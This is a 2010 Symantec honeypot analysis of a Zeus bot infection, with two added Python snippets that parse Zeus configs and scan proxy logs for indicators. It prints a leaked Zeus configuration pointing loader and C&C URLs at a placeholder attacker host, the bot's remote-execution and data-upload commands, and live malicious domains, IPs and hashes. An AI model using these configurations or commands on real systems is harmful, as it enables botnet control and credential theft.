
DeepSight™ Threat Management System

HoneyNet Analysis

Zeus Bot Honeypot Compromise


Version 1: February 24, 2010, 23:00 GMT

Analyst: Anthony Roe

Executive summary

On January 23, 2010, a DeepSight Honeypot was compromised by Zeus Bot. This bot has received a lot
of media hype lately under the alias “Kneber”.

The purpose of this analysis is to describe this Zeus compromise so that customers can recognize this
malware in the wild.

Action items

The DeepSight Threat Analysis Team recommends the following action items:

• Ensure that antivirus software is current to detect this threat.
• Ensure that installed software is fully patched to avoid compromise.

Associated vulnerabilities: Microsoft Active Template Library Header Data Remote Code Execution
Vulnerability
Associated Bugtraq ID: 35558
Compromised application: Microsoft Video ActiveX Control
Compromised platform: Windows XP SP2
HoneyPot ID: 377850

HoneyNet Analysis — February 24, 2010 — Copyright © 2010 Symantec Page 1


Technical description
Zeus bot overview
Zeus bot (also named “Kneber” in some news reports) consists of a bot binary, a builder application, a
configuration file, and a web-based control panel. The builder application is used to build an obfuscated
configuration file and a custom bot for the attacker. Once the configuration file is built, it is uploaded
onto a webserver. Once the bot is installed, it connects to this webserver so the attacker can remotely
control the bot using a web-based control panel.

There are many versions of Zeus. The bot has modules that influence browser processes to steal
browsing information such as authentication credentials. At the time of writing, we are aware of modules
that support Internet Explorer, Mozilla Firefox, and Opera browsers. We will likely see other modules to
support different browsers as Zeus is actively maintained. When an attacker wishes to start a new botnet,
they will either purchase the latest version of Zeus from the malware authors or will download one of the
many leaked versions of the bot for free.

Attackers that use Zeus often run the bot binary through a packer to prevent this common bot from being
detected by antivirus software. Since the Zeus bot doesn’t have any method of propagation of its own,
distribution of the bot is left up to the attacker building the bot network. This is why the campaigns that
are used to install this bot vary widely from botnet to botnet. Many methods can be used to deliver the bot
to the victim; the following are the most common that are seen in the wild:

• Email spam campaigns to lure victims to a malicious site containing exploits or a message crafted
to convince the victim to install the bot from an email attachment.
• Malicious sites that couple drive-by exploit kits and social engineering to install the bot on a
victim’s computer when the victim visits the site.
• Pay-per-install services where the attacker pays a third party to install the malware onto a
victim’s computer.

The client-side exploit kits that are commonly seen with a Zeus bot attack are not a part of the Zeus bot
builder. These kits are bought and sold separately; the attacker configures them to install the copy of
Zeus bot that the attacker has built for the current botnet campaign. The attacker configures the exploit
kit so that the Zeus bot is installed when a victim is successfully compromised by the drive-by exploit kit.
This is typically a trivial operation where the attacker simply specifies a URL that stores the attacker’s
copy of Zeus bot. The versatility of Zeus coupled with an exploit kit is likely one of the reasons why
reporters often get confused by this malware and describe it as new.

We will not cover exploit kits in this analysis, but some of the common kits that are popular are Unique,
Phoenix, YES, Eleonore, Liberty, and a relative newcomer called Fragus, which is currently being sold for
$800. (See Figure 1 for a screenshot of the configuration panel for Fragus.) These exploit kits are
hosted on a webserver. When the victim visits this webserver, their system may be compromised if it is
vulnerable to one of the vulnerabilities that the exploit kit targets.

Figure 1. Fragus exploit pack configuration console.

Building Zeus
The process to build a custom Zeus bot for the attacker’s botnet is very easy. The process is driven by a
GUI application (Figure 2) and a configuration file. The attacker selects a configuration file using the
Browse… button in the builder section of the GUI.

Figure 2. GUI application used to build a Zeus bot.

The following configuration file is an example file taken from a leaked Zeus bot. The configuration file
consists of several sections, but the first sections to be customized are the url_config and
url_compip values in the StaticConfig section and the url_loader and url_server values in
the DynamicConfig section. These values will point to a server that the attacker controls. This is why
Zeus bot command-and-control (C&C) servers change often and differ from botnet to botnet.

;Build time: 09:48:52 16.01.2010 GMT
;Version: 1.2.7.19

entry "StaticConfig"
    ;botnet "btn4"
    timer_config 60 1
    timer_logs 1 1
    timer_stats 20 1
    url_config "%attacker ip%/cfg.bin"
    url_compip "%attacker ip%/ip.php" 4096
    encryption_key "123123"
    ;blacklist_languages 1049
end

entry "DynamicConfig"
    url_loader "%attacker ip%/botname.exe"
    url_server "%attacker ip%/gate.php"
    file_webinjects "webinjects.txt"
    entry "AdvancedConfigs"
        ;"/cfg1.bin"
    end
    entry "WebFilters"
        "!*.microsoft.com/*"
        "@*/login.osmp.ru/*"
    end
    entry "WebDataFilters"
        ;"http://mail.rambler.ru/*" "passw;login"
    end
    entry "WebFakes"
        ;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
    end
    entry "TANGrabber"
        "https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*"
    end
    entry "DnsMap"
        ;127.0.0.1 microsoft.com
    end
end

Figure 3. Zeus bot configuration file example.

The encryption_key is used to obfuscate data sent to and from the C&C web application. Some of the
other sections are also updated to add websites and fields that the attacker wishes to monitor and steal
information from. Finally, the DnsMap section is used to resolve a domain name to an attacker-specified
address. Once the attacker has finished editing the configuration file, they then build the bot using the
GUI’s Build Config and Build Loader buttons. The customized Zeus bot is now ready to be deployed.
At this point, the attacker will likely pack the file to make sure that it is not detected by current antivirus
signatures.
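As an added example (not part of this report or of the Zeus package), the following Python parses a configuration file in the Figure 3 layout and pulls out the four C&C locations an analyst would feed to a blocklist; the sample text is constructed to mirror the figure and keeps the report’s %attacker ip% placeholder.

```python
import shlex

# Constructed sample in the layout of Figure 3; %attacker ip% is the report's own placeholder.
SAMPLE_CONFIG = """\
entry "StaticConfig"
url_config "%attacker ip%/cfg.bin"
url_compip "%attacker ip%/ip.php" 4096
encryption_key "123123"
end
entry "DynamicConfig"
url_loader "%attacker ip%/botname.exe"
url_server "%attacker ip%/gate.php"
entry "AdvancedConfigs"
;"/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
end
end
"""

C2_KEYS = ("url_config", "url_compip", "url_loader", "url_server")

def parse_zeus_config(text):
    """Parse 'entry "Name" ... end' blocks into nested dicts; keyed lines -> [values], bare quoted lines -> "_items"."""
    stack = [{}]  # stack[-1] is the innermost open section, stack[0] the root
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):  # blank or comment line
            continue
        if line == "end":
            if len(stack) == 1:
                raise ValueError("'end' without a matching 'entry'")
            stack.pop()
            continue
        tokens = shlex.split(line)  # honours the double-quoted values
        if tokens[0] == "entry" and len(tokens) == 2:
            stack[-1][tokens[1]] = section = {}
            stack.append(section)
        elif line.startswith('"'):
            stack[-1].setdefault("_items", []).append(tokens)
        else:
            stack[-1][tokens[0]] = tokens[1:]
    if len(stack) != 1:
        raise ValueError("unterminated 'entry' block")
    return stack[0]

def c2_indicators(cfg):
    """Collect the C&C URLs that change from botnet to botnet (blocklist input)."""
    found = {}
    for section in ("StaticConfig", "DynamicConfig"):
        for key, values in cfg.get(section, {}).items():
            if key in C2_KEYS and values:
                found[key] = values[0]
    return found
```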

Building the Zeus bot control panel
The Zeus bot control panel is the PHP web application that is used as the C&C for a Zeus botnet. The
attacker simply configures an SQL database and then runs an install PHP script on the webserver to
install the control panel application. The attacker then uploads the .bin and .exe files that were
configured during the Zeus bot build process to the webserver that is hosting the Zeus bot control panel.
The attacker can then access the cp.php script to view the Zeus bot control interface (shown in Figure
4).

Figure 4. Zeus bot web control panel.

When the attacker installs the bot on a victim’s computer, the bot will be displayed in this control panel
(see Figure 5 below). The web GUI allows the attacker to easily monitor this bot, to profile the
compromised system, and to send commands for the bot to obey.

Figure 5. Zeus bot web control panel with one bot connected.

Using the control panel, the attacker can run the commands listed in Table 1. Note that the functionality
of the bot varies from version to version. These commands are supported by Zeus bot version 1.2.7.19.

Zbot Version 1.2.7.19 Commands

Command                        Function
reboot                         Reboot the computer.
kos                            Kill the operating system.
shutdown                       Shut down the computer.
bc_add [service] [ip] [port]   Add a connect back for [service] using a server with the given [ip] and [port].
bc_del [service] [ip] [port]   Remove the specified connect back.
block_url [url]                Block access to the specified URL.
unblock_url [url]              Unblock access to the specified URL.
block_fake [url]               The bot can inject fake content into the browser for websites. This command
                               blocks the injection of this fake content for the specified URL.
unblock_fake [url]             Re-enable the injection of fake content for the specified URL.
rexec [url] [args]             Download and execute a file from the specified URL. The attacker can optionally
                               specify arguments to pass to the executed file.
rexeci [url] [args]            Download and execute a file from the specified URL as the interactive user. The
                               attacker can optionally specify arguments to pass to the executed file.
lexec [file] [args]            Execute a local file. The attacker can optionally specify arguments to pass to
                               the executed file.
lexeci [file] [args]           Execute a local file as the interactive user. The attacker can optionally specify
                               arguments to pass to the executed file.
addsf [file mask]              Add a file mask that affects the results of local file searches.
delsf [file mask]              Remove a file mask that affects the results of local file searches.
getfile [path]                 Upload the specified file from the victim’s computer to the C&C server.
getcerts                       Upload certificates from all stores to the C&C server.
resetgrab                      Upload the contents of the browser’s protected storage to the C&C server.
upcfg [url]                    Update the bot’s configuration file with the configuration at the specified URL.
rename_bot [name]              Rename the bot.
getmff                         Upload Macromedia Flash files to the C&C server.
delmff                         Remove Macromedia Flash files from the computer.
sethomepage [url]              Set the browser homepage to the specified URL.
Table 1. List of bot capabilities.

Honeypot compromise
Our honeypot crawled to the URL hxxp://cronnerberg[.]com/new/load.php?i=4, which
resolves to the IP 92.60.176.38. This resulted in obfuscated JavaScript being served to the
browser on the Honeypot (Internet Explorer 6).

Figure 4. Decoded shellcode.

When the JavaScript was decoded, we found that it contained exploits for the following vulnerabilities:

• AOL Radio AmpX ActiveX Control 'ConvertFile()' Buffer Overflow Vulnerability (BID: 35028)
• Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (BID: 35558)
[DirectShow ActiveX Control vector]
• Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness (BID: 10514)
• Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability
(BID: 30114)
• Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability (BID: 30035)
• Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution
Vulnerability (BID: 34169)
• Adobe Reader and Acrobat (CVE-2009-2994) U3D 'CLODMeshDeclaration' Buffer Overflow
Vulnerability (BID: 36689)
• Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities
(BID: 27641/CVE-2007-5659)

The exploit pack also included exploits for a Java as well as an Adobe Flash vulnerability. Unfortunately,
we didn’t have enough data captured to be able to identify the exact vulnerabilities that were being
exploited by each of these additional exploits. It’s difficult to identify the exploit kit that was used in the
compromise of this honeypot, but based on the exploits that are included and the script format, we
suspect that it’s either the Eleonore or Phoenix exploit pack, but this is unconfirmed and is merely
conjecture.

When the Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (BID
35558) was exploited on our honeypot, the shellcode that runs first finds the path to the local temporary
files directory using GetTempPathA().

The shellcode then loads the urlmon.dll library and gets the address of URLDownload() from this
library using the GetProcAddress() function. Next, the shellcode attempts to download an executable
from hxxp://cronnerberg.com/new/load.php?i=10 to %TempPath%\pdfupd.exe. Once the
file is downloaded, it is executed using WinExec(). The shellcode also tries to download a second file,
but the URL is corrupt so the second file download fails.

The downloaded pdfupd.exe executable makes a request to atx777.homeip.net (95.169.186.103)
for the pvt777/gtx9.php?id=1d972b84 script.

The webserver responds to this request with a list of URLs that are delimited by a semicolon character:
hxxp://atx777.homeip.net/ldx.exe;hxxp://atx777.homeip.net/severa/veton.exe;hxxp://atx777homeip.net/tbot.exe;

Figure 5. Network activity generated by the compromise.

The pdfupd.exe executable will download each of these executables and then install them on the
compromised system. The file ldx.exe is the Zeus bot binary in this compromise; we can see the
request for the bot configuration conflake9.bin in Figure 5.
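Added example (not from this report): detection logic in Python that walks proxy log lines for the download chain described above and flags clients that completed successive stages of it in order. The log format and client addresses are constructed; the hostnames and paths are the ones recorded in this compromise, and the host serving conflake9.bin is an assumption since the report does not name it.

```python
import re
from collections import defaultdict

# Constructed proxy log: "time client method url status". Hostnames and paths follow this
# compromise; the client addresses are invented and the config host is an assumption.
SAMPLE_LOG = """\
12:00:01 10.0.0.5 GET http://cronnerberg.com/new/load.php?i=4 200
12:00:03 10.0.0.5 GET http://cronnerberg.com/new/load.php?i=10 200
12:00:09 10.0.0.5 GET http://atx777.homeip.net/pvt777/gtx9.php?id=1d972b84 200
12:00:10 10.0.0.5 GET http://atx777.homeip.net/ldx.exe 200
12:00:12 10.0.0.5 GET http://atx777.homeip.net/severa/veton.exe 200
12:00:15 10.0.0.5 GET http://lake777.homeip.net/conflake9.bin 200
12:00:20 10.0.0.9 GET http://www.example.com/index.html 200
12:00:22 10.0.0.9 GET http://cronnerberg.com/new/load.php?i=4 404
"""

# Chain stages in the order they occurred; each regex matches one stage's URLs.
STAGES = [
    ("exploit_landing", re.compile(r"^http://cronnerberg\.com/new/load\.php\?i=\d+$")),
    ("loader_checkin", re.compile(r"^http://[^/]*\.homeip\.net/.*gtx9\.php\?id=")),
    ("payload_fetch", re.compile(r"^http://[^/]*\.homeip\.net/.*\.exe$")),
    ("zeus_config", re.compile(r"^http://[^/]*\.homeip\.net/.*\.bin$")),
]

def parse_line(line):
    """Split one log line into its fields; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 5 or not parts[4].isdigit():
        return None
    return {"time": parts[0], "client": parts[1], "url": parts[3], "status": int(parts[4])}

def stages_per_client(log_text):
    """Map each client to the chain stages it completed, in first-seen order.
    Only 2xx responses count: a blocked or missing payload is not an infection."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not 200 <= rec["status"] < 300:
            continue
        for name, pattern in STAGES:
            if pattern.search(rec["url"]) and name not in seen[rec["client"]]:
                seen[rec["client"]].append(name)
    return dict(seen)

def flag_clients(log_text, min_stages=2):
    """Clients with at least min_stages stages seen in chain order (a landing alone is only exposure)."""
    flagged = set()
    order = [name for name, _ in STAGES]
    for client, stages in stages_per_client(log_text).items():
        ranks = [order.index(s) for s in stages]
        if len(ranks) >= min_stages and ranks == sorted(ranks):
            flagged.add(client)
    return flagged
```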

In addition to installing Zeus bot in this compromise, this attacker also installed Waledac. This malware is
known to have a pay-per-install program that miscreants can use to monetize their activity. Since Zeus
bot is designed to collect credentials from web-browsing activity and since Waledac was also dropped
onto this system, this may mean that this attacker had financial motivations.

Because Zeus bot is freely available, easy to use and configure, and contains powerful capabilities,
attackers commonly use it. Attack scenarios will differ on a case-by-case basis, depending on the
motivations and skill of the attacker building the bot network. The Zeus bot is most often employed in
attacks that have financial motivations.

The best defense against Zeus bot is network- and host-based IPS/IDS, current antivirus software, and
keeping network systems up to date with current patches for software vulnerabilities. The malware that
was installed during this attack against our Honeypot is detected by Symantec AntiVirus as Trojan
Horse.

Attack data
Filenames
Filename: pdfupd.exe
SHA1: 7f7403f2c476a2b8aaa09c224dba6f2de2aab269

Filename: ldx.exe
SHA1: 5b0de33f02bf946de8a7b20b0b69e655315fb17d

Filename: tbot.exe
SHA1: 1d4d3f3cd3642f102c7f16609e02462fc63fc5d8

Filename: veton.exe
SHA1: b06e994355bda719bd98552933c3b3e2d371bfce

Text description of damages
The system is backdoored by this attack, allowing the remote attacker to perform any action that they
wish, including installing additional malware. Ideally, a system that is found to be running a remote
backdoor should have the operating system reinstalled.

System behavior
Outbound HTTP activity from the affected system.

IP addresses
The following domain names and IPs were involved in this attack:
• cronnerberg.com (92.60.176.38)
• atx777.homeip.net (95.169.186.103)
• lake777.homeip.net (95.169.186.103)

Port numbers involved
TCP port 80

Change log
Version 1: February 24, 2010, 23:00 GMT
Initial HoneyNet Analysis released.

Glossary
If you are unfamiliar with any term this report uses, please visit the SecurityFocus glossary at
http://www.securityfocus.com/glossary for more details on information security terminology.

Contact information
World Headquarters
Symantec Corporation
20300 Stevens Creek Blvd.
Cupertino, CA 95014
U.S.A.
+1 408 517 8000
www.symantec.com

About Symantec
Symantec, the world leader in Internet security technology, provides a broad range of content and
network security software and appliance solutions to enterprises, individuals, and service providers. The
company is a leading provider of client, gateway, and server security solutions for virus protection,
firewall and virtual private network, vulnerability management, intrusion detection, Internet content and
e-mail filtering and remote management technologies, as well as security services to enterprises and
service providers around the world. Symantec's Norton brand of consumer security products is a leader in
worldwide retail sales and industry awards. Headquartered in Cupertino, Calif., Symantec has worldwide
operations in 38 countries. For more information, please visit www.symantec.com.

DeepSight Conditions: NO WARRANTIES, EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, SHALL APPLY TO THE
DEEPSIGHT SERVICES OR THE MATERIALS PROVIDED BY SYMANTEC TO USERS OF THE DEEPSIGHT SERVICES. SYMANTEC
PROVIDES THE SERVICE(S) AND MATERIALS “AS IS” AND “AS AVAILABLE.” IN NO EVENT WILL SYMANTEC BE LIABLE FOR THE
TRUTH, ACCURACY, RELIABILITY OR COMPLETENESS OF THE SERVICE(S) OR MATERIALS. SYMANTEC MAKES NO WARRANTY
THAT THE SERVICE(S) OR MATERIALS WILL BE UNINTERRUPTED OR TIMELY, OR THAT THEY WILL PROTECT AGAINST
COMPUTER VULNERABILITIES. Please refer to your services agreement or certificate for further information on conditions of use for
the Services and materials.
Trademarks: Symantec, the Symantec logo, and DeepSight are US registered trademarks of Symantec Corporation or its
subsidiaries. DeepSight Analyzer, DeepSight Extractor, and Bugtraq are trademarks of Symantec Corporation or its subsidiaries.
Other brands and products are trademarks of their respective holders.
Quoting Symantec Information and Data: Authorized Users of Symantec's Deep Sight Services may use or quote individual
sentences and paragraphs from the materials provided as part of the Services, but not large portions or the majority of such
materials, solely for purposes of internal communications. Unless otherwise specifically agreed in writing by Symantec, no external
publication of all or any portion of any materials provided by Symantec is permitted.
Copyright © 2010 Symantec Corporation. All rights reserved. Reproduction is forbidden unless authorized.
